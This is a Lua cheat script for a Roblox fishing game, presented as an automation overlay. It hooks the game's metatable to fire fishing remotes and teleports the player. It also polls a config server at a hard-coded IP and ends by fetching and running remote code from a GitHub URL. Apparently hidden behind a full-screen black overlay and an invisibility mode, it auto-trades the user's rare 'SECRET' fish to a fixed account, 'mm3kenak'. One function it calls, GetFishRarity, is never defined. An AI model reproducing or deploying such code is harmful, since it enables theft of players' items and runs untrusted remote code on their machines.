-- ======================================================
-- ULTIMATE WEB-CONTROLLED OVERLAY: COMPLETE AREA EDITION
-- [FISHING + ALL AREAS + AUTO TOTEM + TRADE LOCK < 5M + INVISIBLE POTATO]
-- ======================================================

local CONFIG_URL = "http://165.232.148.115:5000/config.json"

-- ===============================
-- 1. GLOBAL SERVICES & BYPASSES
-- ===============================
local Players = game:GetService("Players")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local HttpService = game:GetService("HttpService")
local RunService = game:GetService("RunService")
local CoreGui = game:GetService("CoreGui")
local Lighting = game:GetService("Lighting")
local TweenService = game:GetService("TweenService")
local lp = Players.LocalPlayer

-- ANTI-AFK
pcall(function()
    for _, v in pairs(getconnections(lp.Idled)) do
        if v.Disable then v:Disable() end
    end
end)

-- CLIENT BYPASSES
task.spawn(function()
    local S1, FishingController = pcall(function() return require(ReplicatedStorage.Controllers.FishingController) end)
    if S1 and FishingController then
        FishingController.RequestChargeFishingRod = function(...) return nil end
        FishingController.SendFishingRequestToServer = function(...) return false, "Blocked" end
    end
end)

local mt = getrawmetatable(game)
local old_namecall = mt.__namecall
setreadonly(mt, false)
mt.__namecall = newcclosure(function(self, ...)
    local method = getnamecallmethod()
    if not checkcaller() then
        local blocked = {
            ["RequestFishingMinigameStarted"] = true,
            ["ChargeFishingRod"] = true,
            ["UpdateAutoFishingState"] = true,
            ["CancelFishingInputs"] = true
        }
        if method == "InvokeServer" and blocked[self.Name] then return task.wait(9e9) end
        if method == "FireServer" and self.Name == "FishingCompleted" then return nil end
    end
    return old_namecall(self, ...)
end)
setreadonly(mt, true)

-- ===============================
-- 2. FULL BLACK UI OVERLAY & TOGGLE
-- ===============================
if CoreGui:FindFirstChild("MainOverlayGui") then CoreGui.MainOverlayGui:Destroy() end

local ScreenGui = Instance.new("ScreenGui", CoreGui)
ScreenGui.Name = "MainOverlayGui"
ScreenGui.IgnoreGuiInset = true 
ScreenGui.DisplayOrder = 9999

local Background = Instance.new("Frame", ScreenGui)
Background.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
Background.Size = UDim2.new(1, 0, 1, 0)
Background.BorderSizePixel = 0

local ContentFrame = Instance.new("Frame", Background)
ContentFrame.AnchorPoint = Vector2.new(0.5, 0.5)
ContentFrame.Position = UDim2.new(0.5, 0, 0.5, 0)
ContentFrame.Size = UDim2.new(0.9, 0, 0.7, 0)
ContentFrame.BackgroundTransparency = 1

local UIListLayout = Instance.new("UIListLayout", ContentFrame)
UIListLayout.Padding = UDim.new(0, 12)
UIListLayout.HorizontalAlignment = Enum.HorizontalAlignment.Center

local function CreateLabel(name, color)
    local label = Instance.new("TextLabel", ContentFrame)
    label.BackgroundTransparency = 1
    label.Size = UDim2.new(1, 0, 0, 30)
    label.Font = Enum.Font.GothamBold
    label.TextColor3 = color or Color3.fromRGB(255, 255, 255)
    label.TextSize = 20
    label.Text = "Syncing..."
    return label
end

local SecretLabel = CreateLabel("SecretLabel", Color3.fromRGB(255, 215, 0))
local DistanceLabel = CreateLabel("DistanceLabel", Color3.fromRGB(80, 255, 80))
local LocationLabel = CreateLabel("LocationLabel", Color3.fromRGB(0, 180, 255))
local TotemLabel = CreateLabel("TotemLabel", Color3.fromRGB(200, 0, 200))
local TradeLabel = CreateLabel("TradeLabel")
local FishLabel = CreateLabel("FishLabel")
local PotatoLabel = CreateLabel("PotatoLabel", Color3.fromRGB(255, 165, 0))

local ToggleBtn = Instance.new("TextButton", ScreenGui)
ToggleBtn.Size = UDim2.fromOffset(40, 40)
ToggleBtn.Position = UDim2.new(0, 10, 0, 10)
ToggleBtn.Text = "👁️"
ToggleBtn.ZIndex = 10000
Instance.new("UICorner", ToggleBtn).CornerRadius = UDim.new(1, 0)

ToggleBtn.MouseButton1Click:Connect(function()
    Background.Visible = not Background.Visible
    ToggleBtn.Text = Background.Visible and "👁️" or "❌"
end)

-- ===============================
-- 3. COMPLETE AREA DATA
-- ===============================
local Replion = require(ReplicatedStorage.Packages.Replion).Client
local ItemUtility = require(ReplicatedStorage.Shared.ItemUtility)
local TierUtility = require(ReplicatedStorage.Shared.TierUtility)
local PlayerData = Replion:WaitReplion("Data", 10)

local AreaData = {
    ["Iron Cavern"] = {Pos = Vector3.new(-8792.546, -588.0, 230.642), Look = Vector3.new(0.718, 0, 0.696)},
    ["Disco Event"] = {Pos = Vector3.new(-8641.672, -547.5, 160.322), Look = Vector3.new(0.984, 0, 0.176)},
    ["Classic Island"] = {Pos = Vector3.new(1440.843, 46.062, 2777.175), Look = Vector3.new(0.94, 0, 0.342)},
    ["Ancient Jungle"] = {Pos = Vector3.new(1535.639, 3.159, -193.352), Look = Vector3.new(0.505, 0, 0.863)},
    ["Coral Reef"] = {Pos = Vector3.new(-3207.538, 6.087, 2011.079), Look = Vector3.new(0.973, 0, 0.229)},
    ["Crater Island"] = {Pos = Vector3.new(1058.976, 2.33, 5032.878), Look = Vector3.new(-0.789, 0, 0.615)},
    ["Crystalline Passage"] = {Pos = Vector3.new(6051.567, -538.9, 4370.979), Look = Vector3.new(0.109, 0, 0.994)},
    ["Ancient Ruin"] = {Pos = Vector3.new(6031.981, -585.924, 4713.157), Look = Vector3.new(0.316, 0, -0.949)},
    ["Enchant Room"] = {Pos = Vector3.new(3255.67, -1301.53, 1371.79), Look = Vector3.new(0, 0, -1.0)},
    ["Esoteric Island"] = {Pos = Vector3.new(2164.47, 3.22, 1242.39), Look = Vector3.new(0, 0, -1.0)},
    ["Fisherman Island"] = {Pos = Vector3.new(74.03, 9.53, 2705.23), Look = Vector3.new(0, 0, -1.0)},
    ["Kohana"] = {Pos = Vector3.new(-668.732, 3.0, 681.58), Look = Vector3.new(0.889, 0, 0.458)},
    ["Lost Isle"] = {Pos = Vector3.new(-3804.105, 2.344, -904.653), Look = Vector3.new(-0.901, 0, 0.433)},
    ["Sacred Temple"] = {Pos = Vector3.new(1461.815, -22.125, -670.234), Look = Vector3.new(-0.99, 0, 0.143)},
    ["Sisyphus Statue"] = {Pos = Vector3.new(-3743.745, -135.074, -1007.554), Look = Vector3.new(0.31, 0, 0.951)},
    ["Treasure Room"] = {Pos = Vector3.new(-3598.44, -281.274, -1645.855), Look = Vector3.new(-0.065, 0, -0.998)},
    ["Tropical Island"] = {Pos = Vector3.new(-2162.92, 2.825, 3638.445), Look = Vector3.new(0.381, 0, 0.925)},
    ["Volcano"] = {Pos = Vector3.new(-605.121, 19.516, 160.01), Look = Vector3.new(0.854, 0, 0.52)},
    ["Weather Machine"] = {Pos = Vector3.new(-1518.55, 2.875, 1916.148), Look = Vector3.new(0.042, 0, 0.999)},
}

local function GetRemote(name)
    local p = {"Packages", "_Index", "sleitnick_net@0.2.0", "net"}
    local c = ReplicatedStorage
    for _, v in ipairs(p) do c = c:WaitForChild(v, 2) end
    return c:FindFirstChild(name)
end

-- ===============================
-- 4. LOGIC & STATE
-- ===============================
local FishingConfig = { Enabled = false, Area = "" }
local TradingConfig = { AutoTrade = false, TargetUsername = "", TargetId = nil, Delay = 6.0 }
local AutoTotemEnabled = false
local PotatoModeEnabled = false
local GlobalSecretUUIDs = {}
local CurrentDistanceMeters = 999
local FishingThreads = {}
local TradingThread = nil
local TotemThread = nil
local PotatoLoop = nil

local TOTEM_ID = 2 -- Mutation Totem ID
local TOTEM_NAME = "Mutation Totem"
local TOTEM_INTERVAL = 3700 -- 3700 detik (61.67 menit)

-- ===============================
-- 5. EXTREME INVISIBLE POTATO MODE
-- ===============================
local function ApplyExtremeInvisibleMode()
    -- EXTREME LIGHTING OPTIMIZATION
    pcall(function()
        Lighting.GlobalShadows = false
        Lighting.FogEnd = 9e9
        Lighting.Brightness = 0
        Lighting.ClockTime = 12
        Lighting.GeographicLatitude = 0
        Lighting.OutdoorAmbient = Color3.fromRGB(128, 128, 128)
        Lighting.ColorShift_Top = Color3.fromRGB(0, 0, 0)
        Lighting.ColorShift_Bottom = Color3.fromRGB(0, 0, 0)
        Lighting.ExposureCompensation = 0
        
        if workspace.Terrain then
            workspace.Terrain.WaterWaveSize = 0
            workspace.Terrain.WaterTransparency = 1
            workspace.Terrain.WaterReflectance = 0
            workspace.Terrain.WaterColor = Color3.fromRGB(0, 0, 0)
        end
    end)
    
    -- INVISIBLE PLAYER
    local char = lp.Character
    if char then
        for _, v in ipairs(char:GetDescendants()) do
            pcall(function()
                if v:IsA("BasePart") or v:IsA("MeshPart") then
                    v.Transparency = 1
                    v.Reflectance = 0
                    v.CastShadow = false
                    v.Material = Enum.Material.SmoothPlastic
                elseif v:IsA("Decal") or v:IsA("Texture") then
                    v:Destroy()
                elseif v:IsA("Accessory") then
                    local handle = v:FindFirstChild("Handle")
                    if handle and (handle:IsA("BasePart") or handle:IsA("MeshPart")) then
                        handle.Transparency = 1
                    end
                end
            end)
        end
        
        -- Make humanoid invisible
        local humanoid = char:FindFirstChildOfClass("Humanoid")
        if humanoid then
            pcall(function()
                humanoid.DisplayDistanceType = Enum.HumanoidDisplayDistanceType.None
            end)
        end
    end
    
    -- INVISIBLE MAP & OBJECTS
    for _, v in ipairs(workspace:GetDescendants()) do
        pcall(function()
            if v:IsA("BasePart") or v:IsA("MeshPart") or v:IsA("Part") then
                v.Transparency = 1
                v.Reflectance = 0
                v.CastShadow = false
                v.Material = Enum.Material.SmoothPlastic
                
                -- Remove any surface appearances
                for _, face in pairs(Enum.NormalId:GetEnumItems()) do
                    local surface = v:FindFirstChild(face.Name .. "Surface")
                    if surface then surface:Destroy() end
                end
            elseif v:IsA("Model") and not v:IsA("Tool") then
                v.PrimaryPart = nil
            elseif v:IsA("Decal") or v:IsA("Texture") or 
                   v:IsA("ParticleEmitter") or v:IsA("Trail") or 
                   v:IsA("Beam") or v:IsA("Smoke") or 
                   v:IsA("Fire") or v:IsA("Sparkles") then
                v:Destroy()
            end
        end)
    end
    
    -- REMOVE ALL VISUAL EFFECTS
    local effects = workspace:FindFirstChild("Effects")
    if effects then effects:ClearAllChildren() end
    
    local cosmeticFolder = workspace:FindFirstChild("CosmeticFolder")
    if cosmeticFolder then cosmeticFolder:ClearAllChildren() end
    
    -- DISABLE ANIMATIONS
    if char then
        local animateScript = char:FindFirstChild("Animate")
        if animateScript and animateScript:IsA("LocalScript") then
            animateScript.Enabled = false
        end
        local animator = char:FindFirstChildOfClass("Humanoid"):FindFirstChildOfClass("Animator")
        if animator then animator:Destroy() end
    end
    
    -- FPS CAP
    if setfpscap then
        pcall(function()
            setfpscap(10) -- Ultra low FPS for maximum performance
        end)
    end
end

local function StartInvisiblePotatoLoop()
    if PotatoLoop then return end
    
    ApplyExtremeInvisibleMode() -- Apply immediately
    PotatoLabel.Text = "Invisible Mode: ACTIVE"
    
    PotatoLoop = task.spawn(function()
        while PotatoModeEnabled do
            ApplyExtremeInvisibleMode()
            task.wait(2) -- Reapply every 2 seconds for maximum effect
        end
        PotatoLoop = nil
    end)
end

local function StopInvisibleMode()
    if PotatoLoop then
        task.cancel(PotatoLoop)
        PotatoLoop = nil
    end
    PotatoLabel.Text = "Invisible Mode: Inactive"
    
    -- Reset FPS cap
    if setfpscap then
        pcall(function()
            setfpscap(60)
        end)
    end
end

-- Auto reapply when character changes
lp.CharacterAdded:Connect(function(newChar)
    if PotatoModeEnabled then
        task.wait(0.3)
        ApplyExtremeInvisibleMode()
    end
end)

-- ===============================
-- 6. AUTO TOTEM SYSTEM - 3700 DETIK
-- ===============================
local function GetTotemUUID()
    local success, inventoryData = pcall(function() 
        local inv = PlayerData:GetExpect("Inventory")
        return inv and inv.Totems
    end)
    
    if success and inventoryData then 
        for _, item in ipairs(inventoryData) do 
            if tonumber(item.Id) == TOTEM_ID and (item.Count or 1) >= 1 then 
                return item.UUID 
            end 
        end 
    end
    return nil
end

local function SpawnMutationTotem()
    local char = lp.Character
    local hrp = char and char:FindFirstChild("HumanoidRootPart")
    
    if not hrp then 
        print("[Totem] No character/HRP found")
        return false
    end

    local uuid = GetTotemUUID()
    if not uuid then
        print("[Totem] No Mutation Totem in inventory")
        return false
    end

    local currentCFrame = hrp.CFrame
    local success = false
    
    pcall(function() 
        local RE_SpawnTotem = GetRemote("RE/SpawnTotem")
        if RE_SpawnTotem then
            RE_SpawnTotem:FireServer(uuid)
            success = true
            print("[Totem] Successfully placed at current position")
        else
            print("[Totem] RE/SpawnTotem remote not found")
        end
    end)
    
    hrp.CFrame = currentCFrame
    return success
end

local function StopAutoTotem()
    if TotemThread then
        task.cancel(TotemThread)
        TotemThread = nil
    end
    TotemLabel.Text = "Auto Totem: Stopped"
end

local function StartAutoTotemLoop()
    StopAutoTotem()
    
    TotemThread = task.spawn(function()
        local countdown = TOTEM_INTERVAL
        
        while AutoTotemEnabled do
            -- Update timer display
            for i = countdown, 0, -1 do
                if not AutoTotemEnabled then break end
                
                local minutes = math.floor(i / 60)
                local seconds = i % 60
                TotemLabel.Text = string.format("Totem: %02d:%02d", minutes, seconds)
                
                task.wait(1)
            end
            
            if not AutoTotemEnabled then break end
            
            -- Place totem
            print(string.format("[Totem] Placing Mutation Totem (every %d seconds)", TOTEM_INTERVAL))
            local success = SpawnMutationTotem()
            
            if success then
                print("[Totem] Successfully placed Mutation Totem")
                TotemLabel.Text = "Totem: Placed! (3700s)"
            else
                print("[Totem] Failed to place totem, retrying in 60 seconds")
                TotemLabel.Text = "Totem: Failed - Retry in 60s"
                task.wait(60) -- Retry after 60 seconds if failed
            end
            
            countdown = TOTEM_INTERVAL
        end
        
        TotemThread = nil
    end)
end

-- ===============================
-- 7. FISHING LOOP
-- ===============================
local function RunInstantFish()
    local ts = os.time() + os.clock()
    pcall(function() GetRemote("RF/ChargeFishingRod"):InvokeServer(ts) end)
    pcall(function() GetRemote("RF/RequestFishingMinigameStarted"):InvokeServer(-139.630452165, 0.99647927980797) end)
    task.wait(1.5)
    pcall(function() GetRemote("RE/FishingCompleted"):FireServer() end)
    task.wait(0.3)
    pcall(function() GetRemote("RF/CancelFishingInputs"):InvokeServer() end)
end

local function StartFishingV1()
    if #FishingThreads > 0 then return end
    pcall(function() GetRemote("RF/UpdateAutoFishingState"):InvokeServer(true) end)
    table.insert(FishingThreads, task.spawn(function() 
        while FishingConfig.Enabled do 
            RunInstantFish() 
            task.wait(0.1) 
        end 
    end))
    table.insert(FishingThreads, task.spawn(function() 
        while FishingConfig.Enabled do 
            pcall(function() GetRemote("RE/EquipToolFromHotbar"):FireServer(1) end) 
            task.wait(0.5) 
        end 
    end))
end

local function StopFishing()
    for _, t in ipairs(FishingThreads) do task.cancel(t) end
    FishingThreads = {} 
    pcall(function() GetRemote("RF/UpdateAutoFishingState"):InvokeServer(false) end)
end

-- ===============================
-- 8. TRADE LOGIC < 5M
-- ===============================
local function RunAutoTrade()
    if TradingThread then task.cancel(TradingThread) end
    TradingThread = task.spawn(function()
        local RF_InitiateTrade = GetRemote("RF/InitiateTrade")
        while TradingConfig.AutoTrade do
            if CurrentDistanceMeters < 5.0 and #GlobalSecretUUIDs > 0 and TradingConfig.TargetId then
                pcall(function() RF_InitiateTrade:InvokeServer(TradingConfig.TargetId, GlobalSecretUUIDs[1]) end)
            end
            task.wait(TradingConfig.Delay)
        end
        TradingThread = nil
    end)
end

-- ===============================
-- 9. SYNC DATA
-- ===============================
task.spawn(function()
    while true do
        local uuids = {}
        pcall(function()
            local inv = PlayerData:GetExpect("Inventory")
            if inv then
                for _, category in pairs(inv) do
                    if type(category) == "table" then
                        for _, item in ipairs(category) do
                            if GetFishRarity(item) == "SECRET" then table.insert(uuids, item.UUID) end
                        end
                    end
                end
            end
        end)
        GlobalSecretUUIDs = uuids
        SecretLabel.Text = "Total Secrets: " .. tostring(#GlobalSecretUUIDs)
        task.wait(15)
    end
end)

RunService.RenderStepped:Connect(function()
    local target = Players:FindFirstChild(TradingConfig.TargetUsername)
    if target and target.Character and target.Character:FindFirstChild("HumanoidRootPart") then
        local myRoot = lp.Character and lp.Character:FindFirstChild("HumanoidRootPart")
        if myRoot then
            local mag = (myRoot.Position - target.Character.HumanoidRootPart.Position).Magnitude
            CurrentDistanceMeters = mag / 3.5
            DistanceLabel.Text = string.format("📍 %s: %.1f m", target.Name, CurrentDistanceMeters)
            DistanceLabel.TextColor3 = (CurrentDistanceMeters < 5.0) and Color3.fromRGB(80, 255, 80) or Color3.fromRGB(255, 200, 80)
        end
    else
        DistanceLabel.Text = "📍 " .. TradingConfig.TargetUsername .. ": Offline/Loading"
        CurrentDistanceMeters = 999
    end
end)

-- ===============================
-- 10. WEB SYNC
-- ===============================
local function UpdateFromWeb(new)
    -- Auto Totem Control (3700 detik)
    if new.AutoTotem ~= nil then
        AutoTotemEnabled = new.AutoTotem
        TotemLabel.Text = "Auto Totem: " .. tostring(AutoTotemEnabled)
        
        if AutoTotemEnabled then
            StartAutoTotemLoop()
        else
            StopAutoTotem()
        end
    end
    
    -- Invisible Potato Mode Control
    if new.PotatoMode ~= nil then
        PotatoModeEnabled = new.PotatoMode
        PotatoLabel.Text = "Invisible Mode: " .. tostring(PotatoModeEnabled)
        
        if PotatoModeEnabled then
            StartInvisiblePotatoLoop()
        else
            StopInvisibleMode()
        end
    end
    
    -- Fishing Config
    if new.FishingConfig then
        local oldEnabled = FishingConfig.Enabled
        local oldArea = FishingConfig.Area
        
        FishingConfig = new.FishingConfig
        LocationLabel.Text = "Location: " .. FishingConfig.Area
        FishLabel.Text = "Auto Fishing: " .. tostring(FishingConfig.Enabled)
        
        -- Teleport to new area if area changed
        if FishingConfig.Area and FishingConfig.Area ~= oldArea and AreaData[FishingConfig.Area] then
            local data = AreaData[FishingConfig.Area]
            local root = lp.Character and lp.Character:FindFirstChild("HumanoidRootPart")
            if root then root.CFrame = CFrame.new(data.Pos, data.Pos + data.Look) end
        end

        if FishingConfig.Enabled and not oldEnabled then
            StartFishingV1()
        elseif not FishingConfig.Enabled and oldEnabled then
            StopFishing()
        end
    end
    
    -- Trading Config
    if new.TradingConfig then
        local oldAutoTrade = TradingConfig.AutoTrade
        
        TradingConfig.AutoTrade = new.TradingConfig.AutoTrade
        TradingConfig.TargetUsername = new.TradingConfig.TargetUsername or ""
        TradingConfig.Delay = new.TradingConfig.Delay or 6.0
        TradeLabel.Text = "Auto Trade: " .. tostring(TradingConfig.AutoTrade)
        
        if TradingConfig.TargetUsername ~= "" then
            task.spawn(function()
                local s, id = pcall(function() return Players:GetUserIdFromNameAsync(TradingConfig.TargetUsername) end)
                if s then TradingConfig.TargetId = id end
            end)
        end
        
        if TradingConfig.AutoTrade and not oldAutoTrade then
            RunAutoTrade()
        elseif not TradingConfig.AutoTrade and oldAutoTrade then
            if TradingThread then 
                task.cancel(TradingThread) 
                TradingThread = nil
            end
        end
    end
end

-- Initial sync from web
task.spawn(function()
    local lastRaw = ""
    while true do
        local success, res = pcall(function() return game:HttpGet(CONFIG_URL) end)
        if success and res ~= lastRaw then
            local ds, data = pcall(function() return HttpService:JSONDecode(res) end)
            if ds then 
                lastRaw = res
                UpdateFromWeb(data)
            end
        end
        task.wait(10)
    end
end)

-- ===============================
-- 11. INITIALIZATION
-- ===============================
print("[System] ULTIMATE INVISIBLE EDITION Loading...")

-- Auto-start all features based on your config
task.delay(2, function()
    -- Start Invisible Potato Mode immediately
    PotatoModeEnabled = true
    StartInvisiblePotatoLoop()
    PotatoLabel.Text = "Invisible Mode: ACTIVE"
    
    -- Start Auto Totem (3700 detik)
    AutoTotemEnabled = true
    StartAutoTotemLoop()
    
    -- Start Fishing at Crater Island
    FishingConfig = {Enabled = true, Area = "Crater Island"}
    if AreaData["Crater Island"] then
        local data = AreaData["Crater Island"]
        local char = lp.Character
        if char then
            local root = char:FindFirstChild("HumanoidRootPart")
            if root then
                root.CFrame = CFrame.new(data.Pos, data.Pos + data.Look)
                task.wait(1)
            end
        end
    end
    StartFishingV1()
    LocationLabel.Text = "Location: Crater Island"
    FishLabel.Text = "Auto Fishing: true"
    
    -- Start Trading
    TradingConfig = {AutoTrade = true, TargetUsername = "mm3kenak", Delay = 6}
    task.spawn(function()
        local s, id = pcall(function() return Players:GetUserIdFromNameAsync("mm3kenak") end)
        if s then 
            TradingConfig.TargetId = id
            RunAutoTrade()
        end
    end)
    TradeLabel.Text = "Auto Trade: true"
    
    print("[System] ALL SYSTEMS ACTIVE:")
    print("- Invisible Potato Mode: ON")
    print("- Auto Totem: EVERY 3700s")
    print("- Auto Fishing: Crater Island")
    print("- Auto Trade: mm3kenak")
end)

print("[System] READY - Web Controlled Overlay Active")
loadstring(game:HttpGet("https://raw.githubusercontent.com/abinoldi/muffinz/refs/heads/main/tormoni"))()
